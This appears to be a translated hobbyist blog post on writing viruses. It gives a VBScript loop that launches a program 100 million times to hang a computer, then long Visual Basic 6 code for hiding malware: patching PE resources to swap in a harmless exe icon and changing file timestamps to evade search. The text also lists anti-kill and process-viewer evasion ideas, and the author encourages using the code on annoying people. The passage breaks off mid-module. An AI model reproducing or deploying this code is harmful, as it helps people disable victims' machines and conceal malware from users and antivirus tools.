Rather than gossiping about people, let's go over some stuff from the internet world... with luck it's useful... if not, no big deal... I can't really do it myself yet either, heheheh. Now I want to cover viruses, but remember, don't get up to mischief with this... ok... although if you run into someone annoying, well, who cares? The sin is on you guys... at most I get splashed a little.

Making a virus with Notepad.

Making a virus is not hard, because we can make one with Notepad, which is on every computer running Windows. The virus we will make here makes the infected computer unable to run at all.

Let's Begin!
Steps:

1. Open Notepad.
2. Copy and paste the code below (the part in bold):

    option explicit
    dim wshshell
    set wshshell = wscript.createobject("wscript.shell")
    dim x
    for x = 1 to 100000000
        wshshell.run "tourstart.exe"
    next

3. Save the Notepad file as virus.vbs (make sure "save as type" is changed to "all files").
4. Remember!! Do not click the file, because your computer will be filled with 100000000 tourstart windows covering your screen, and it will hang completely before you manage to delete them all.
5. If you want to try this virus, recreate the program with one difference: change 100000000 to 10 for the test. Then after you click the program, your screen will be filled with only 10 tourstarts....
Implementing Stealth Techniques in Viruses
$> A little Words...
The author is not responsible for any damage caused by the use of this article (Use at Your Own Risk).

$> Start...
Some (or maybe all) Vx3rs (virus writers) have surely hit the problem of making their virus hard to delete, or of minimising its detection by the user or by anti-virus software. So how do Vx3rs hide their viruses on the victim's computer? There are several classic approaches that are used very often, such as:
1. Renaming the virus file to (something resembling) a Windows system file, e.g. RunDll32.exe, Winsys32.exe, etc.
2. Placing the virus file in a hidden folder or in the Windows system folder.
3. Blocking access to Task Manager and other tools that can show running processes. This is natural, since the virus wants to keep its existence.
4. Using a random filename.
5. Using a common icon such as MS Word, Folder, a Setup program, etc.
6. Blocking the Search facility.
7. And others.

So what are the weaknesses? Using a common icon is very fatal, because the user can tell the default *.exe icon apart from the icon the virus uses. For example, if the virus uses the MS Word icon, something looks off: "The icon is Word, so why is the extension .exe?". Another example is the case of a random filename. Here the random name has to be stored somewhere, because when the virus's trigger runs it will look for that file. The storage is either a file or a key in the registry. Both storage techniques are equally good as long as they are combined with encryption. In one virus I found and analysed, Kangen.E used a random name stored in a *.sys file, and that file was left as is, with no protection of its contents at all. That made it easy to trace the trigger name of that virus.
So what steps should actually be taken so that our virus is not easily traced by the user? In my view there are several very important points:
1. Replace the icon directly (extract and replace), rather than relying on a default icon.
2. Change the FileTime, FileDate and size of the virus file so it is not easily found with Search.
3. Use API hooking to track process-viewer tools; don't rely on the window caption, since many tools no longer use a window caption.
4. If possible, don't launch virus instances via "shell", because that makes the virus processes parent and child: if the parent dies, the child dies with it.
5. Always use another virus instance to watch for each other's presence (anti-kill process) so the virus can stay alive.

$> How to...?
I used Visual Basic 6.0 to try out a stealth technique that is (in my opinion) fairly good, plus several source code and article references from the Internet. I also tried this technique in the Diary.Exe virus (v1.3-1.5) with some changes.

1. Replacing the icon
If you have ever come across software that extracts or replaces (or both) the icon of a file, then more or less the same thing can be implemented in a virus :D. An example of the algorithm:

START EXECUTION
  | Copy myself.exe to destination path
  | Search for the file whose icon will be extracted
  | Extract the icon, save to destination path
  | Change myself.exe with the extracted icon file (*.ico)
  | Delete the icon file once it is no longer used
END EXECUTION

I use Shell32.dll as the file to extract the icon from; in this case I pick the default *.exe icon (the one with the white-blue box :P).
The source code is roughly as follows (a PictureBox object is needed on the Form):
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Sub cariikon(pathcari As String, pathekstrak As String, jenisikon As String, pic2 As PictureBox)
    Dim poin As Long
    poin = 1
    Dim i As Long
    Dim buf(1000) As Double
    Dim jum As Integer
    jum = 0
    Dim jikon As Long
    jikon = 0
    ' ICO file header written in front of the extracted image data:
    ' ICONDIR (reserved, type 1, count 1) followed by one ICONDIRENTRY
    Dim init As String
    init = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
    Dim strbaca As String
    strbaca = Space(2238)
    Dim fildat As String
    Dim new_dic As String
    ' Start of a BITMAPINFOHEADER (biSize = 40 = "(", then width/height) used
    ' as the search pattern for icon images inside the source file
    Dim rs As String
    rs = Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
    Dim buff As Double
    buff = 1024 ^ 2
    Open pathcari For Binary As #1
    If LOF(1) > buff Then
        fildat = Space(buff)
    Else
        fildat = Space(LOF(1))
    End If
balik:
    If poin > LOF(1) Then
        GoTo tulis
    End If
    Get #1, poin, fildat
    i = 1
carilagi:
    DoEvents
    i = InStr(i + 1, fildat, "(" & rs)
    If i > 0 Then
        'lst.Add "#" & lst.Count & "#", i + poin - 1
        buf(jum) = i + poin - 1
        jum = jum + 1
    End If
    If i + Len(rs) > buff Or i = 0 Then
        poin = poin + buff - Len("(" & rs) - 1
        GoTo balik
    Else
        GoTo carilagi
    End If
tulis:
    Close
    Open pathcari For Binary As #1
    For poin = 0 To jum - 1
        DoEvents
        If Right(pathekstrak, 1) <> "\" Then
            pathekstrak = pathekstrak & "\"
        End If
        If poin <> jenisikon Then GoTo lsg
        Open pathekstrak & "Ikon.ico" For Output As #2: Close #2
        Open pathekstrak & "Ikon.ico" For Binary As #2
        'i = lst.Item("#" & poin & "#")
        i = buf(poin)
        Get #1, i, strbaca
        Put #2, 1, init & strbaca & Chr$(255)
        Close #2
        If ikon(pathekstrak & "Ikon.ico", pic2) = 0 Then
            Kill pathekstrak & "Ikon.ico"
        End If
        DoEvents
lsg:
    Next poin
    Close #1
    Close
End Sub

' Returns 1 if the extracted file loads as a picture, 0 otherwise
' (was declared as a Sub in the original, but it returns a value)
Function ikon(path As String, pic As PictureBox) As Integer
    On Error GoTo ero
    pic.Picture = LoadPicture(path)
    ikon = 1
    Exit Function
ero:
    ikon = 0
    Exit Function
End Function
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------

The cariikon procedure searches the file whose icon is to be extracted, by the index of that icon. The resulting icon is still 16x16, but that is enough to fool the user. Keep in mind that the index of the *.exe icon inside shell32.dll differs for each Windows version, especially between Windows 9x and Windows 2k/2003/XP/NT. So how do we swap our virus's icon with the icon file we just extracted? (Source code reference from the Internet, author: Naveed, neenojee@hotmail.com)

1st. Module:
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Option Explicit

Type DIB_HEADER
    Size As Long
    Width As Long
    Height As Long
    Planes As Integer
    Bitcount As Integer
    Reserved As Long
    ImageSize As Long
End Type

Type ICON_DIR_ENTRY
    bWidth As Byte
    bHeight As Byte
    bColorCount As Byte
    bReserved As Byte
    wPlanes As Integer
    wBitCount As Integer
    dwBytesInRes As Long
    dwImageOffset As Long
End Type

Type ICON_DIR
    Reserved As Integer
    Type As Integer
    Count As Integer
End Type

Type DIB_BITS
    Bits() As Byte
End Type

Public Enum Errors
    FILE_CREATE_FAILED = 1000
    FILE_READ_FAILED
    INVALID_PE_SIGNATURE
    INVALID_ICO
    NO_RESOURCE_TREE
    NO_ICON_BRANCH
    CANT_HACK_HEADERS
End Enum

Public Function ReplaceIcons(Source As String, Dest As String) As Long
    Dim IcoDir As ICON_DIR
    Dim IcoDirEntry As ICON_DIR_ENTRY
    Dim tBits As DIB_BITS
    Dim Icons() As IconDescriptor
    Dim lngRet As Long
    Dim BytesRead As Long
    Dim hSource As Long
    Dim hDest As Long
    Dim ResTree As Long
    hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0)
    If hSource >= 0 Then
        If Valid_ICO(hSource) Then
            SetFilePointer hSource, 0, 0, 0
            ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0&
            ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0&
            SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0
            ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte
            ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0&
            CloseHandle hSource
            hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0, ByVal 0)
            If hDest >= 0 Then
                If Valid_PE(hDest) Then
                    ResTree = GetResTreeOffset(hDest)
                    If ResTree > 308 Then ' Sanity check
                        lngRet = GetIconOffsets(hDest, ResTree, Icons)
                        SetFilePointer hDest, Icons(1).Offset, 0, 0
                        WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0&
                    Else
                        CloseHandle hDest
                    End If
                Else
                    CloseHandle hDest
                End If
                CloseHandle hDest
            Else
            End If
        Else
            CloseHandle hSource
        End If
    Else
    End If
    ReplaceIcons = 0
    Exit Function
End Function

Public Function Valid_ICO(hfile As Long) As Boolean
    Dim tDir As ICON_DIR
    Dim BytesRead As Long
    If (hfile > 0) Then
        ReadFile hfile, tDir, Len(tDir), BytesRead, ByVal 0&
        If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then
            Valid_ICO = True
        Else
            Valid_ICO = False
        End If
    Else
        Valid_ICO = False
    End If
End Function
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------

2nd. Module
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Option Explicit

Public Type IMAGE_DOS_HEADER
    Magic As Integer
    cblp As Integer
    cp As Integer
    crlc As Integer
    cparhdr As Integer
    minalloc As Integer
    maxalloc As Integer
    ss As Integer
    sp As Integer
    csum As Integer
    ip As Integer
    cs As Integer
    lfarlc As Integer
    ovno As Integer
    res(3) As Integer
    oemid As Integer
    oeminfo As Integer
    res2(9) As Integer
    lfanew As Long
End Type

Public Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOtionalHeader As Integer
    Characteristics As Integer
End Type

Public Type IMAGE_DATA_DIRECTORY
    DataRVA As Long
    DataSize As Long
End Type

Public Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkVer As Byte
    MinorLinkVer As Byte
    CodeSize As Long
    InitDataSize As Long
    unInitDataSize As Long
    EntryPoint As Long
    CodeBase As Long
    DataBase As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOSVer As Integer
    MinorOSVer As Integer
    MajorImageVer As Integer
    MinorImageVer As Integer
    MajorSSVer As Integer
    MinorSSVer As Integer
    Win32Ver As Long
    ImageSize As Long
    HeaderSize As Long
    Checksum As Long
    Subsystem As Integer
    DLLChars As Integer
    StackRes As Long
    StackCommit As Long
    HeapReserve As Long
    HeapCommit As Long
    LoaderFlags As Long
    RVAsAndSizes As Long
    DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type

Public Type IMAGE_SECTION_HEADER
    SectionName(7) As Byte
    Address As Long
    VirtualAddress As Long
    SizeOfData As Long
    PData As Long
    PReloc As Long
    PLineNums As Long
    RelocCount As Integer
    LineCount As Integer
    Characteristics As Long
End Type

Type IMAGE_RESOURCE_DIR
    Characteristics As Long
    TimeStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    NamedEntries As Integer
    IDEntries As Integer
End Type

Type RESOURCE_DIR_ENTRY
    Name As Long
    Offset As Long
End Type

Type RESOURCE_DATA_ENTRY
    Offset As Long
    Size As Long
    CodePage As Long
    Reserved As Long
End Type

Public Type IconDescriptor
    ID As Long
    Offset As Long
    Size As Long
End Type

Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private SectionAlignment As Long
Private FileAlignment As Long
Private ResSectionRVA As Long
Private ResSectionOffset As Long

Public Function Valid_PE(hfile As Long) As Boolean
    Dim Buffer(12) As Byte
    Dim lngBytesRead As Long
    Dim tDosHeader As IMAGE_DOS_HEADER
    If (hfile > 0) Then
        ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0&
        CopyMemory Buffer(0), tDosHeader.Magic, 2
        If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then
            SetFilePointer hfile, tDosHeader.lfanew, 0, 0
            ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
            If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And (Buffer(3) = 0) Then
                Valid_PE = True
                Exit Function
            End If
        End If
    End If
    Valid_PE = False
End Function

Public Function GetResTreeOffset(hfile As Long) As Long
    On Error GoTo ErrHandler:
    Dim tDos As IMAGE_DOS_HEADER
    Dim tFile As IMAGE_FILE_HEADER
    Dim tOptional As IMAGE_OPTIONAL_HEADER
    Dim tSections() As IMAGE_SECTION_HEADER
    Dim BytesRead As Long
    Dim intC As Integer
    Dim TreeFound As Boolean
    TreeFound = False
    If (hfile > 0) Then
        SetFilePointer hfile, 0, 0, 0
        ' Get the offset of the Image File Header
        ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0&
        SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
        ' Get the Image File Header and the Image Optional Header
        ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0&
        ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
        ' Get section headers
        ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER
        ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections, BytesRead, ByVal 0&
        ' Make sure there is a resource tree in this file
        If (tOptional.DataEntries(2).DataSize) Then
            ' Save section alignment and file alignment of image
            SectionAlignment = tOptional.SectionAlignment
            FileAlignment = tOptional.FileAlignment
            ' Determine which section contains the resource tree
            For intC = 0 To UBound(tSections)
                If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _
                   And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) > tOptional.DataEntries(2).DataRVA) Then
                    TreeFound = True
                    ' Save RVA and offset of resource section for future calculations
                    ResSectionRVA = tSections(intC).VirtualAddress
                    ResSectionOffset = tSections(intC).PData
                    ' Calculate the physical file offset of the resource tree
                    GetResTreeOffset = tSections(intC).PData + (tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress)
                    Exit For
                End If
            Next intC
            If Not TreeFound Then
                GetResTreeOffset = -1
            End If
        Else
            GetResTreeOffset = -1
        End If
    Else
        GetResTreeOffset = -1
    End If
    Exit Function
ErrHandler:
End Function

Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As IconDescriptor) As Long
    On Error GoTo ErrHandler:
    Dim Root As IMAGE_RESOURCE_DIR              ' Root node of resource tree
    Dim L1Entries() As RESOURCE_DIR_ENTRY       ' 1st level of directory entries
    Dim L2Root() As IMAGE_RESOURCE_DIR          ' Level 2 resource directories
    Dim L2Entries() As RESOURCE_DIR_ENTRY       ' 2nd level of directory entries
    Dim L3Root() As IMAGE_RESOURCE_DIR          ' Level 3 resource directories
    Dim L3Entries() As RESOURCE_DIR_ENTRY       ' 3rd level of directory entries
    Dim DataEntries() As RESOURCE_DATA_ENTRY    ' Resource data entries
    Dim DIB As DIB_HEADER                       ' Descriptor for icon images
    Dim iLvl1 As Integer                        ' Loop Counter (first level)
    Dim iLvl2 As Integer                        ' Loop Counter (second level)
    Dim iLvl3 As Integer                        ' Loop Counter (third level)
    Dim Cursor As Long                          ' Temp val for setting file pointer
    Dim BytesRead As Long                       ' For ReadFile()
    Dim Count As Integer                        ' Number of icons found
    If (hfile > 0) Then
        Count = 0
        SetFilePointer hfile, ByVal TreeOffset, 0, 0
        ' Get the root node and begin navigating the resource tree
        ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0
        ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
        ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
        ' Get first level child nodes
        For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
            SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0
            ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
            If L1Entries(iLvl1).Name = 3 Then
                ' Jump to level 2 and get directory
                ' Strip high-order byte from offset
                CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                Cursor = Cursor + TreeOffset
                SetFilePointer hfile, ByVal Cursor, 0, 0
                ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
                ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
                ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As RESOURCE_DIR_ENTRY
                For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
                    ' Read second level child nodes
                    CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                    Cursor = Cursor + TreeOffset
                    SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
                    ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
                    ' Jump to level 3 and get directory
                    CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                    Cursor = Cursor + TreeOffset
                    SetFilePointer hfile, ByVal Cursor, 0, 0
                    ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
                    ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
                    ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DATA_ENTRY
                    For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
                        ' Read third level child nodes
                        CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                        Cursor = Cursor + TreeOffset
                        SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0
                        ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
                        ' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure
                        SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0
                        ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
                        ' Convert RVA of IconDir structure to file offset and store
                        Count = Count + 1
                        ReDim Preserve Icons(Count) As IconDescriptor
                        Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
                        ' Store ID of icon resource
                        Icons(Count).ID = L2Entries(iLvl2).Name
                        ' Store Size of icon resource
                        SetFilePointer hfile, Icons(Count).Offset, 0, 0
                        ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0&
                        Icons(Count).Size = DIB.ImageSize + 40
                    Next iLvl3
                Next iLvl2
            End If
        Next iLvl1
    Else
        Count = 0
    End If
    ' Return the number of icons found
    GetIconOffsets = Count
    Exit Function
ErrHandler:
End Function

Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _
                                DIBAttrib As ICON_DIR_ENTRY) As Boolean
    On Error GoTo ErrHandler:
    Dim Cursor As Long                          ' File pointer position
    Dim Root As IMAGE_RESOURCE_DIR              ' Root node of res tree
    Dim L1Entries() As RESOURCE_DIR_ENTRY       ' First-level child nodes
    Dim L2Root() As IMAGE_RESOURCE_DIR          ' Second-level root nodes
    Dim L2Entries() As RESOURCE_DIR_ENTRY       ' Second-level child nodes
    Dim L3Root() As IMAGE_RESOURCE_DIR          ' Third-level root nodes
    Dim L3Entries() As RESOURCE_DIR_ENTRY       ' Third-level child nodes
    Dim DataEntries() As RESOURCE_DATA_ENTRY    ' IMAGE_RESOURCE_DATA_ENTRY structs
    Dim IcoDir As ICON_DIR                      ' IconDirectory in EXE
    Dim iLvl1 As Integer                        ' Loop Counter (first level)
    Dim iLvl2 As Integer                        ' Loop Counter (second level)
    Dim iLvl3 As Integer                        ' Loop Counter (third level)
    Dim intC As Integer                         ' Loop Counter (general)
    Dim BytesRead As Long                       ' Returned by Read/WriteFile API's
    If (hfile >= 0) Then
        ' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures)
        DIBOffset = Offset_to_RVA(DIBOffset)
        SetFilePointer hfile, ByVal ResTree, 0, 0
        ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
        ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
        ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
        ' Loop through first-level child nodes and find RT_GROUP_ICON branch
        For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
            SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0
            ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
            If L1Entries(iLvl1).Name = &HE Then
                ' RT_GROUP_ICON branch found
                CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                Cursor = Cursor + ResTree
                SetFilePointer hfile, Cursor, 0, 0
                ' Read second-level directory
                ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
                ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As RESOURCE_DIR_ENTRY
                ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
                For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
                    CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
                    ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
                    CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor, 0, 0
                    ' Read third-level directory
                    ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
                    ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
                    For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
                        ' Read third-level child nodes
                        CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                        Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
                        SetFilePointer hfile, Cursor, 0, 0
                        ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
                        ' Jump to RESOURCE_DATA_ENTRY
                        CopyMemory Cursor, L3Entries(iLvl3).Offset, 3
                        Cursor = Cursor + ResTree
                        SetFilePointer hfile, Cursor, 0, 0
                        ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY
                        ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
                        ' Jump to and read ICON_DIR structure
                        Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset)
                        SetFilePointer hfile, Cursor, 0, 0
                        ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0&
                        For intC = 1 To IcoDir.Count
                            WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0&
                            SetFilePointer hfile, 2, 0, 1
                        Next intC
                    Next iLvl3
                Next iLvl2
            ElseIf L1Entries(iLvl1).Name = 3 Then
                CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                Cursor = Cursor + ResTree
                SetFilePointer hfile, ByVal Cursor, 0, 0
                ' Read second-level directory
                ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
                ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As RESOURCE_DIR_ENTRY
                ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
                For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
                    CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
                    ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
                    CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor, 0, 0
                    ' Read third-level directory
                    ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
                    ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
                    For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
                        ' Read third-level child nodes
                        CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                        Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
                        SetFilePointer hfile, Cursor, 0, 0
                        ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
                        ' Jump to and hack the RESOURCE_DATA_ENTRY
                        Cursor = L3Entries(iLvl3).Offset + ResTree
                        SetFilePointer hfile, Cursor, 0, 0
                        WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
                        WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal 0&
                    Next iLvl3
                Next iLvl2
            End If
        Next iLvl1
    Else
        HackDirectories = False
        Exit Function
    End If
    HackDirectories = True
    Exit Function
ErrHandler:
End Function

Private Function RVA_to_Offset(RVA As Long) As Long
    On Error GoTo ErrHandler:
    Dim TempOffset As Long ' Difference of RVA and start of section
    TempOffset = RVA - ResSectionRVA
    If (TempOffset >= 0) Then
        ' Calculate the file offset of the RVA
        RVA_to_Offset = ResSectionOffset + TempOffset
    Else
        RVA_to_Offset = -1
    End If
    Exit Function
ErrHandler:
End Function

Private Function Offset_to_RVA(Offset As Long) As Long
    On Error GoTo ErrHandler:
    Dim TempOffset As Long ' Difference of Offset and start of section
    ' Get distance between offset and start of resource section
    TempOffset = Offset - ResSectionOffset
    If TempOffset >= 0 Then
        ' Calculate RVA of the file offset
        Offset_to_RVA = ResSectionRVA + TempOffset
    Else
        Offset_to_RVA = -1
    End If
    Exit Function
ErrHandler:
End Function
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------

The ReplaceIcons procedure (1st Module) replaces our virus's icon with that *.ico file (Source = path of the icon file, Dest = path of the file whose icon is to be replaced). There are some weaknesses in this icon replacement. First, if the virus is compressed or packed with settings that strip the file's resources or only compress them, the icon replacement will not go smoothly. Second, for some files the icon to be extracted is sometimes not 16x16, or cannot be extracted at all.

2.
Changing the Date and Time of the Virus File
Which field is used most often in the Windows file Search facility? The file's access/modified/created time. Take the example of virus A.exe, created on 1 Feb 2006, which starts infecting your computer on 2 Feb 2006. What you do to find that file is fill in the date field of Search with the range 1 Feb 2006 to 2 Feb 2006. So what must be done? We have to change the access/modified/created dates of our virus file so that the user cannot (or at least has a harder time to) find it. Here is source code that roughly illustrates the technique: (Source code reference from the Internet, author: marskarthik@angelfire.com)
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Option Explicit

Public Declare Function SetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function GetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Public Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Public Declare Function SystemTimeToFileTime Lib "kernel32" (lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Public Declare Function LocalFileTimeToFileTime Lib "kernel32" (lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Public Declare Function OpenFile Lib "kernel32" (ByVal lpFileName As String, lpReOpenBuff As OFSTRUCT, ByVal wStyle As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Const OF_READ = &H0
Public Const OF_READWRITE = &H2
Public Const OF_REOPEN = &H8000
Public Const OF_SHARE_COMPAT = &H0
Public Const OF_SHARE_DENY_NONE = &H40
Public Const OF_SHARE_DENY_READ = &H30
Public Const OF_SHARE_DENY_WRITE = &H20
Public Const OF_SHARE_EXCLUSIVE = &H10
Public Const OF_VERIFY = &H400
Public Const OF_WRITE = &H1
Public Const OFS_MAXPATHNAME = 128

Public Type OFSTRUCT
    cBytes As Byte
    fFixedDisk As Byte
    nErrCode As Integer
    Reserved1 As Integer
    Reserved2 As Integer
    szPathName(OFS_MAXPATHNAME) As Byte
End Type

Public Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

